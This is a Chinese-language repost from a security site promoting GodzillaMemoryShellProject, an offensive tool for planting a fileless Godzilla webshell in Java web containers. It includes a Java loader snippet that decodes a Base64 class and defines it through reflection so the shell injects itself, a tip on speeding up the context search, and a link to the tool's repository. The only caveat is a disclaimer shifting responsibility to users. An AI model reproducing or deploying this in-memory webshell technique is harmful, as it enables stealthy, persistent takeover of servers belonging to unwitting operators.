哥斯拉内存Shell项目 GodzillaMemoryShellProject

admin 2023年5月8日00:16:29评论58 views字数 1038阅读3分27秒阅读模式

===================================

免责声明

 

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

0x01 工具介绍

当你拥有一个可以加载任意Class的能力,你就可以编译此项目,编译对应容器的Class 当Class被加载之后,你将获得一个哥斯拉的内存shell,你连接时可以填写任意URI路径

0x02 安装与使用

1、如何调用哥斯拉内存shell
//哥斯拉内存shell的class Base64            String godzillaMemShellClassBase64 = "...........";//base64 解码byte[] classBytes =  Base64.getDecoder().decode(godzillaMemShellClassBase64);//获得上下文的ClassLoader            ClassLoader loader = Thread.currentThread().getContextClassLoader();//反射获得defineClass方法 用来定义Class            Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);//使得defineClass方法可访问            defineClassMethod.setAccessible(true);//调用defineClass方法 从class字节码创建Class            Class clazz = (Class) defineClassMethod.invoke(loader,classBytes,0,classBytes.length);//创建哥斯拉内存shell实例 哥斯拉内存Shell在此处自动注入            clazz.newInstance();
2、注入内存shell/查找上下文很慢,可以根据目标环境减小maxDetch的值

哥斯拉内存Shell项目  GodzillaMemoryShellProject

3、自动搜寻上下文

哥斯拉内存Shell项目  GodzillaMemoryShellProject

0x03 项目链接下载

 

https://github.com/BeichenDream/GodzillaMemoryShellProject

 

原文始发于微信公众号(网络安全者):哥斯拉内存Shell项目 -- GodzillaMemoryShellProject

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月8日00:16:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   哥斯拉内存Shell项目 GodzillaMemoryShellProjecthttps://cn-sec.com/archives/1715190.html

发表评论

匿名网友 填写信息